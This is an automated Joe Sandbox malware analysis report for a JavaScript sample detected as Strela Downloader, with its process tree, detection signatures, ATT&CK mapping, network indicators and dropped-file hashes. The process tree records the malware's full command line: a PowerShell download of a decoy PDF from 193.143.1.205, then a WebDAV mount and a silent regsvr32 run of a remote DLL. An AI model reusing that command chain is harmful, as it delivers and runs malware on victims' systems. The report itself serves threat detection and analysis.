Windows
Analysis Report
18474255912080825433.js
Overview
General Information
Detection
Score: | 100 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Signatures
Classification
- System is w10x64
- wscript.exe (PID: 3052 cmdline:
C:\Windows \System32\ WScript.ex e "C:\User s\user\Des ktop\18474 2559120808 25433.js" MD5: A47CBE969EA935BDD3AB568BB126BC80) - cmd.exe (PID: 3412 cmdline:
"C:\Window s\System32 \cmd.exe" /c powersh ell.exe -C ommand "In voke-WebRe quest -Out File C:\Us ers\user\A ppData\Loc al\Temp\in voice.pdf http://193 .143.1.205 /invoice.p hp"&&start C:\Users\ user\AppDa ta\Local\T emp\invoic e.pdf&&cmd /c net us e \\193.14 3.1.205@88 88\davwwwr oot\&&cmd /c regsvr3 2 /s \\193 .143.1.205 @8888\davw wwroot\320 5920355309 45.dll MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) - conhost.exe (PID: 2672 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - powershell.exe (PID: 6516 cmdline:
powershell .exe -Comm and "Invok e-WebReque st -OutFil e C:\Users \user\AppD ata\Local\ Temp\invoi ce.pdf htt p://193.14 3.1.205/in voice.php" MD5: 04029E121A0CFA5991749937DD22A1D9) - Acrobat.exe (PID: 3200 cmdline:
"C:\Progra m Files\Ad obe\Acroba t DC\Acrob at\Acrobat .exe" "C:\ Users\user \AppData\L ocal\Temp\ invoice.pd f" MD5: 24EAD1C46A47022347DC0F05F6EFBB8C) - AcroCEF.exe (PID: 1924 cmdline:
"C:\Progra m Files\Ad obe\Acroba t DC\Acrob at\acrocef _1\AcroCEF .exe" --ba ckgroundco lor=167772 15 MD5: 9B38E8E8B6DD9622D24B53E095C5D9BE) - AcroCEF.exe (PID: 2020 cmdline:
"C:\Progra m Files\Ad obe\Acroba t DC\Acrob at\acrocef _1\AcroCEF .exe" --ty pe=utility --utility -sub-type= network.mo jom.Networ kService - -lang=en-U S --servic e-sandbox- type=none --log-seve rity=disab le --user- agent-prod uct="Reade rServices/ 23.6.20320 Chrome/10 5.0.0.0" - -lang=en-U S --user-d ata-dir="C :\Users\us er\AppData \Local\CEF \User Data " --log-fi le="C:\Pro gram Files \Adobe\Acr obat DC\Ac robat\acro cef_1\debu g.log" --m ojo-platfo rm-channel -handle=21 08 --field -trial-han dle=1608,i ,758401380 02054175,1 5904904802 646042573, 131072 --d isable-fea tures=Back ForwardCac he,Calcula teNativeWi nOcclusion ,WinUseBro wserSpellC hecker /pr efetch:8 MD5: 9B38E8E8B6DD9622D24B53E095C5D9BE)
- svchost.exe (PID: 4876 cmdline:
C:\Windows \System32\ svchost.ex e -k netsv cs -p -s B ITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
- cleanup
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
JoeSecurity_StrelaDownloader | Yara detected Strela Downloader | Joe Security |
System Summary |
---|
Source: | Author: Nasreddine Bencherchali (Nextron Systems): |
Source: | Author: Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton: |
Source: | Author: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: |
Source: | Author: Nasreddine Bencherchali (Nextron Systems), Alejandro Houspanossian ('@lekz86'): |
Source: | Author: Florian Roth (Nextron Systems), Hieu Tran: |
Source: | Author: Florian Roth (Nextron Systems), Jonhnathan Ribeiro, oscd.community: |
Source: | Author: Florian Roth (Nextron Systems): |
Source: | Author: Nasreddine Bencherchali (Nextron Systems): |
Source: | Author: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: |
Source: | Author: Michael Haag: |
Source: | Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): |
Source: | Author: frack113: |
Source: | Author: vburov: |
Source: | Author: Nasreddine Bencherchali (Nextron Systems): |
HIPS / PFW / Operating System Protection Evasion |
---|
Source: | Author: Joe Security: |
Click to jump to signature section
Software Vulnerabilities |
---|
Source: | Argument value : | Go to definition | ||
Source: | Argument value : | Go to definition |
Source: | Child: |
Source: | IP Address: |
Source: | ASN Name: |
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: |
Spam, unwanted Advertisements and Ransom Demands |
---|
Source: | File source: |
System Summary |
---|
Source: | COM Object queried: | Jump to behavior |
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior |
Source: | File created: | Jump to behavior |
Source: | Initial sample: |
Source: | Classification label: |
Source: | File created: | Jump to behavior |
Source: | Mutant created: | ||
Source: | Mutant created: |
Source: | File created: | Jump to behavior |
Source: | File read: | Jump to behavior |
Source: | Key opened: | Jump to behavior |
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior |
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior |
Source: | Key value queried: | Jump to behavior |
Source: | Window detected: |
Source: | File opened: | Jump to behavior |
Data Obfuscation |
---|
Source: | Anti Malware Scan Interface: |
Source: | Process created: | |||
Source: | Process created: | Jump to behavior |
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior |
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior |
Source: | Window found: | Jump to behavior |
Source: | Window / User API: | Jump to behavior | ||
Source: | Window / User API: | Jump to behavior |
Source: | Thread sleep count: | Jump to behavior | ||
Source: | Thread sleep count: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior |
Source: | File opened: | Jump to behavior |
Source: | Last function: | ||
Source: | Last function: |
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior |
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: |
Source: | Process information queried: | Jump to behavior |
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior |
Source: | Process created: | |||
Source: | Process created: | Jump to behavior |
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior |
Source: | Key value queried: | Jump to behavior |
Stealing of Sensitive Information |
---|
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior |
Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact |
---|---|---|---|---|---|---|---|---|---|---|---|---|---|
Gather Victim Identity Information | 32 Scripting | Valid Accounts | 1 Command and Scripting Interpreter | 32 Scripting | 11 Process Injection | 11 Masquerading | OS Credential Dumping | 1 Network Share Discovery | Remote Services | Data from Local System | Data Obfuscation | Exfiltration Over Other Network Medium | Abuse Accessibility Features |
Credentials | Domains | Default Accounts | 1 Exploitation for Client Execution | 1 DLL Side-Loading | 1 DLL Side-Loading | 31 Virtualization/Sandbox Evasion | LSASS Memory | 11 Security Software Discovery | Remote Desktop Protocol | Data from Removable Media | Junk Data | Exfiltration Over Bluetooth | Network Denial of Service |
Email Addresses | DNS Server | Domain Accounts | 2 PowerShell | Logon Script (Windows) | Logon Script (Windows) | 11 Process Injection | Security Account Manager | 1 Process Discovery | SMB/Windows Admin Shares | Data from Network Shared Drive | Steganography | Automated Exfiltration | Data Encrypted for Impact |
Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | Login Hook | 1 Obfuscated Files or Information | NTDS | 31 Virtualization/Sandbox Evasion | Distributed Component Object Model | Input Capture | Protocol Impersonation | Traffic Duplication | Data Destruction |
Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 1 DLL Side-Loading | LSA Secrets | 1 Application Window Discovery | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact |
Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | Steganography | Cached Domain Credentials | 1 File and Directory Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop |
DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | Compile After Delivery | DCSync | 22 System Information Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery |
This section contains all screenshots as thumbnails, including those not shown in the slideshow.
Source | Detection | Scanner | Label | Link |
---|---|---|---|---|
0% | ReversingLabs |
Source | Detection | Scanner | Label | Link |
---|---|---|---|---|
0% | Avira URL Cloud | safe | ||
0% | Avira URL Cloud | safe |
Name | Source | Malicious | Antivirus Detection | Reputation |
---|---|---|---|---|
false |
| unknown | ||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false |
| unknown |
- No. of IPs < 25%
- 25% < No. of IPs < 50%
- 50% < No. of IPs < 75%
- 75% < No. of IPs
IP | Domain | Country | Flag | ASN | ASN Name | Malicious |
---|---|---|---|---|---|---|
193.143.1.205 | unknown | unknown | 57271 | BITWEB-ASRU | true |
IP |
---|
127.0.0.1 |
Joe Sandbox version: | 42.0.0 Malachite |
Analysis ID: | 1587556 |
Start date and time: | 2025-01-10 14:50:08 +01:00 |
Joe Sandbox product: | CloudBasic |
Overall analysis duration: | 0h 4m 46s |
Hypervisor based Inspection enabled: | false |
Report type: | full |
Cookbook file name: | default.jbs |
Analysis system description: | Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01 |
Number of analysed new started processes analysed: | 17 |
Number of new started drivers analysed: | 0 |
Number of existing processes analysed: | 0 |
Number of existing drivers analysed: | 0 |
Number of injected processes analysed: | 0 |
Technologies: |
|
Analysis Mode: | default |
Analysis stop reason: | Timeout |
Sample name: | 18474255912080825433.js |
Detection: | MAL |
Classification: | mal100.rans.spyw.expl.evad.winJS@27/59@0/2 |
EGA Information: | Failed |
HCA Information: |
|
Cookbook Comments: |
|
- Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
- Excluded IPs from analysis (whitelisted): 2.23.240.205, 172.64.41.3, 162.159.61.3, 184.28.90.27, 23.209.209.135, 2.16.168.107, 2.16.168.105, 23.204.152.213, 23.204.152.210, 192.168.2.6, 13.107.246.45, 4.245.163.56, 3.233.129.217, 104.126.112.182
- Excluded domains from analysis (whitelisted): e4578.dscg.akamaiedge.net, chrome.cloudflare-dns.com, client.wns.windows.com, fs.microsoft.com, e8652.dscx.akamaiedge.net, otelrules.azureedge.net, slscr.update.microsoft.com, acroipm2.adobe.com.edgesuite.net, ctldl.windowsupdate.com, p13n.adobe.io, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, acroipm2.adobe.com, fe3cr.delivery.mp.microsoft.com, ocsp.digicert.com, armmf.adobe.com, ssl-delivery.adobe.com.edgekey.net, e16604.g.akamaiedge.net, a122.dscd.akamai.net, geo2.adobe.com, prod.fs.microsoft.com.akadns.net, crl.root-x1.letsencrypt.org.edgekey.net
- Not all processes where analyzed, report is missing behavior information
- Report size exceeded maximum capacity and may have missing behavior information.
- Report size getting too big, too many NtCreateKey calls found.
- Report size getting too big, too many NtOpenKeyEx calls found.
- Report size getting too big, too many NtProtectVirtualMemory calls found.
- Report size getting too big, too many NtQueryValueKey calls found.
- VT rate limit hit for: 18474255912080825433.js
Time | Type | Description |
---|---|---|
08:51:09 | API Interceptor | |
08:51:13 | API Interceptor | |
08:51:13 | API Interceptor | |
08:51:21 | API Interceptor |
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context |
---|---|---|---|---|---|---|
193.143.1.205 | Get hash | malicious | Strela Downloader | Browse |
| |
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
|
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context |
---|---|---|---|---|---|---|
BITWEB-ASRU | Get hash | malicious | Strela Downloader | Browse |
| |
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
|
Process: | C:\Windows\System32\svchost.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 1310720 |
Entropy (8bit): | 0.7263103525361182 |
Encrypted: | false |
SSDEEP: | 1536:9J8s6YR3pnhWKInznxTgScwXhCeEcrKYSZNmTHk4UQJ32aqGT46yAwFM5hA7yH0S:9JZj5MiKNnNhoxuH |
MD5: | 96ECEA27F4B02053D13188763C914C95 |
SHA1: | 83FC2D3AFE43D73DCC14293C0059173D3CC4FFC9 |
SHA-256: | 92CA0F5245528AD2BFE9D689537B04DA296BA2BDCC6EC16407F95CA1EE2672DA |
SHA-512: | CC5DD5D9AFD1D1D0E96B42E261451FEC2CB1A3337592649179BE816B8DEF976FBC795F37AB3FE66040AF245025109A461A6EF1A8C6382E8A8D36815E346FD4B8 |
Malicious: | false |
Preview: |
Process: | C:\Windows\System32\svchost.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 1310720 |
Entropy (8bit): | 0.7555770834957716 |
Encrypted: | false |
SSDEEP: | 1536:lSB2ESB2SSjlK/svFH03N9Jdt8lYkr3g16xj2UPkLk+kLWyrufTRryrUYc//kbxW:lazaSvGJzYj2UlmOlOL |
MD5: | FEBDFD44C2DB6D9F900E6D8AA6EEB9A6 |
SHA1: | 76945E67403D84A6FEC660DAC2671BBE936BC384 |
SHA-256: | 8AA6E75CB7ADC91CDCA822E92702F7D9F87C7A82985F325D3623F5062E136F30 |
SHA-512: | 7A9F1592E1F8C26764E1D5344542D3B143B1AAC869DC0428E1962C21AA043DFD47FCDFC307889EC39E746814A0726309B35446136A88FDC785E22F564E6B3F98 |
Malicious: | false |
Preview: |
Process: | C:\Windows\System32\svchost.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 16384 |
Entropy (8bit): | 0.07948843887972179 |
Encrypted: | false |
SSDEEP: | 3:LHlKYec3cGuNaAPaU1lmK//olluxmO+l/SNxOf:DlKz+BuNDPaU+aAgmOH |
MD5: | 1F8F0B1E2800AB395FF2FFF9CEA4C6AD |
SHA1: | 1270FE86DE46B03171DB8076C8BB8FA80BD1B885 |
SHA-256: | 8271EE8F13362681BE5DCB1EEED6B44F3CD93199F33FE64EED8D0AA78264F2A7 |
